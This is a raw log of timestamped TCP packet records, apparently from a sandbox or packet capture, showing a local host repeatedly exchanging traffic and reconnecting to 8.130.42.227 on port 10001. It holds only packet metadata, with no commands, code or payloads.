                                                                Oct 1, 2024 09:16:59.293608904 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293608904 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293628931 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293634892 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293648005 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293658972 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.293673038 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.293697119 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294352055 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294363022 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294373989 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294419050 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294444084 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294454098 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294466019 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294476032 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294486046 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294492006 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294512987 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294544935 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294545889 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294557095 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294569016 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.294590950 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294616938 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.294616938 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.295258045 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.295269012 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.295308113 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.295337915 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.377784014 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.377832890 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.377842903 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.377891064 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.377906084 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535190105 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535270929 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535279989 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535281897 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535295010 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535305977 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535315037 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535320997 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535320997 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535326004 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535336018 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535347939 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535414934 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535593987 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535629034 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535639048 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535655022 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535680056 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535857916 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535868883 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535880089 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535911083 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535959005 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.535959005 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.535969973 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536016941 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536067009 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536077976 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536087990 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536118031 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536143064 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536218882 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536230087 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536238909 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536251068 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536272049 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536297083 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536470890 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536482096 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536493063 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536503077 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536514997 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536520958 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536520958 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536557913 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536809921 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536820889 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536830902 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536860943 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536870003 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536875963 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536880016 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536890984 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536900997 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536910057 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536923885 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.536930084 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536950111 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.536973953 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537024021 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537034988 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537045956 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537056923 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537066936 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537092924 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537118912 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537638903 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537668943 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537679911 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537698030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537698030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537731886 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537806988 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537817955 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537827969 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537838936 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537858963 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537884951 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.537961960 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537974119 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537985086 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.537996054 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538000107 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538007975 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538018942 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538028002 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538031101 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538043022 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538049936 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538069963 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538088083 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538491964 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538511038 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.538541079 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.538561106 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622050047 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622059107 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622066975 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622071981 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622077942 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622124910 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622131109 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622251987 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622286081 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622292042 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622304916 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622318029 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622323990 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622329950 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622340918 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622364998 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622394085 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622436047 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622447014 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622457027 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622462034 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622467995 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622478008 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622486115 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622487068 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622497082 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622529030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622529030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622564077 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622622013 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622771978 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622813940 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622817993 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622823954 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622852087 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622867107 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622878075 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622889042 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622900963 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.622922897 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622948885 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622948885 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.622996092 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623007059 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623016119 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623025894 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623037100 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623043060 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623049021 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623068094 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623092890 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623125076 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623136997 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623145103 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623162985 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623197079 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623547077 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623557091 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623563051 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623603106 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623603106 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623614073 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623624086 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.623641014 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.623668909 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789215088 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789232969 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789244890 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789262056 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789274931 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789285898 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789298058 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789304018 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789310932 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789321899 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789328098 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789324045 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789338112 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789350033 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789362907 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789371014 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789376020 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789386988 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789400101 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789412022 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789422989 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789427042 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789427042 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789427996 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789433956 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789444923 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789454937 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789458990 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789468050 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789479017 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789489985 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789499044 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789499044 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789500952 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789515018 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789520979 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789526939 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789537907 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789542913 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789549112 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789561033 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789572001 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789580107 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789582014 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789592981 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789602041 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789607048 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789618015 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789617062 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789629936 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789638996 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789640903 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789652109 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789660931 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789664030 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789671898 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789680004 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789685011 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789695978 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789702892 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789707899 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789719105 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789727926 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789731026 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789741993 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789752007 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789752960 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789762974 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789776087 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789781094 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789789915 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.789799929 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789822102 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.789853096 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.791994095 CEST4973010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.796762943 CEST10001497308.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.799922943 CEST4973110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.804871082 CEST10001497318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:16:59.804955006 CEST4973110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.805041075 CEST4973110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:16:59.809838057 CEST10001497318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:00.947107077 CEST10001497318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:00.947196960 CEST4973110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:00.947241068 CEST10001497318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:00.947288036 CEST4973110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:00.947365046 CEST4973110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:00.952214956 CEST10001497318.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:01.053352118 CEST4973210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:01.261184931 CEST10001497328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:01.261324883 CEST4973210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:01.261580944 CEST4973210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:01.266524076 CEST10001497328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:02.228874922 CEST10001497328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:02.228920937 CEST10001497328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:02.228972912 CEST4973210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:02.229021072 CEST4973210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:02.229136944 CEST4973210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:02.233833075 CEST10001497328.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:02.334590912 CEST4973310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:02.339428902 CEST10001497338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:02.339507103 CEST4973310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:02.339623928 CEST4973310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:02.344377041 CEST10001497338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:03.309341908 CEST10001497338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:03.309425116 CEST4973310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:03.309566021 CEST10001497338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:03.309623003 CEST4973310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:03.412405968 CEST4973310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:03.412724018 CEST4973410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:03.417304039 CEST10001497338.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:03.417582035 CEST10001497348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:03.417651892 CEST4973410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:03.417782068 CEST4973410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:03.422538042 CEST10001497348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:04.365963936 CEST10001497348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:04.366070032 CEST4973410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:04.366118908 CEST10001497348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:04.366175890 CEST4973410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:04.450629950 CEST4973410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:04.455944061 CEST10001497348.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:04.556041002 CEST4973510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:04.561012030 CEST10001497358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:04.561084032 CEST4973510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:04.561846972 CEST4973510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:04.566690922 CEST10001497358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:05.519514084 CEST10001497358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:05.519622087 CEST4973510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:05.519651890 CEST10001497358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:05.519697905 CEST4973510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:05.519776106 CEST4973510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:05.524564028 CEST10001497358.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:05.631335974 CEST4973610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:05.636194944 CEST10001497368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:05.636277914 CEST4973610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:05.636363983 CEST4973610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:05.641079903 CEST10001497368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:06.606287003 CEST10001497368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:06.606342077 CEST4973610001192.168.2.48.130.42.227
